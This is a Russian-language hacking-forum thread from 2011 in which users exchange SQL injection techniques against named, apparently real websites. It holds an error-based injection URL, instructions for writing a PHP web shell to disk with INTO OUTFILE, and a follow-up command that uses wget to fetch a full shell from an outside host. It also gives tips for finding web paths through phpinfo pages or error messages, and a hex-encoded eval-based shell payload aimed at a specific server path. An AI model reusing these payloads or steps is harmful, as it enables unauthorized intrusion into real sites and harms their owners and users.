ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.10.2011, 23:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Konqi
Konqi said:
http://www.lcoastpress.com/journal.php?id=7+or+1+group+by+concat((select+vers ion()),floor(rand(0)*2))having+min(0)+or+1--+
я понимаю значение етих команд, но не понимаю как и почему такое их скопление работает , хто может обьяснить или где я могу почитать?
|
|
|
|
23.10.2011, 23:19
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от qaz
qaz said:
я понимаю значение етих команд, но не понимаю как и почему такое их скопление работает
, хто может обьяснить или где я могу почитать?
/threadnav119047-1-10.html
|
|
|
23.10.2011, 23:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
всем ку)
http://www.uralremstroy.ru/catalog.php?group_id=104
с простыми эксплуатациями sql inj знаком, но как тут вывести кол-во полей ни как не пойму или там вообще нельзя вывести?
Заранее спасибо.
|
|
|
|
24.10.2011, 03:24
|
|
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
Провел на форуме:
724939
Репутация:
108
|
|
Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:
PHP код:
PHP:
[COLOR="#000000"]SELECT '[COLOR="#0000BB"][/COLOR]' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;[/COLOR]
|
|
|
|
24.10.2011, 05:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от =Zeus=
=Zeus= said:
Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:
PHP код:
PHP:
[COLOR="#000000"]SELECT '[COLOR="#0000BB"][/COLOR]' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;[/COLOR]
select '' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php
-O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного).
upd. "e" - двойные кавычки, чот форум одинарные ставит.
upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.
|
|
|
|
24.10.2011, 15:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от Melfis
Melfis said:
select '' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php
-O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного).
upd. "e" - двойные кавычки, чот форум одинарные ставит.
upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.
Ошибка же.
Вот так правильно будет:
Код:
Code:
''
или вообще без кавычек
''
|
|
|
|
24.10.2011, 17:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Konqi
Konqi said:
/threadnav119047-1-10.html
чёт я там не нашол нигде ответа
|
|
|
|
24.10.2011, 17:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от Boolean
Boolean said:
Ошибка же.
Вот так правильно будет:
Код:
Code:
''
или вообще без кавычек
''
Сообщение от None
upd. "e" - двойные кавычки, чот форум одинарные ставит.
перепутал с q -__-
|
|
|
|
24.10.2011, 18:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от qaz
qaz said:
чёт я там не нашол нигде ответа
http://www.xakep.ru/post/52222/
|
|
|
|
24.10.2011, 23:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от z0mbie86
z0mbie86 said:
Что неправильно я делаю?
Код:
Code:
http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(SELECT/**/0x2533433F7068702532306576616C28245F52455554553545B636D645D293B25/**/INTO/**/OUTFILE/**/'/srv/www/vhosts/217.8.80.55/modules/gw/jindex.php')and'
А там есть вообще sql inj?
http://wifi.hm-ugratel.ru/?m[admin]&id=123
http://wifi.hm-ugratel.ru/?m[admin]&id=abc
http://wifi.hm-ugratel.ru/?m[admin]&id=123'
http://wifi.hm-ugratel.ru/?m[admin]&id=abc'
Разницу чувствуешь? я - нет. Если и есть, то жесть какая слепая.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
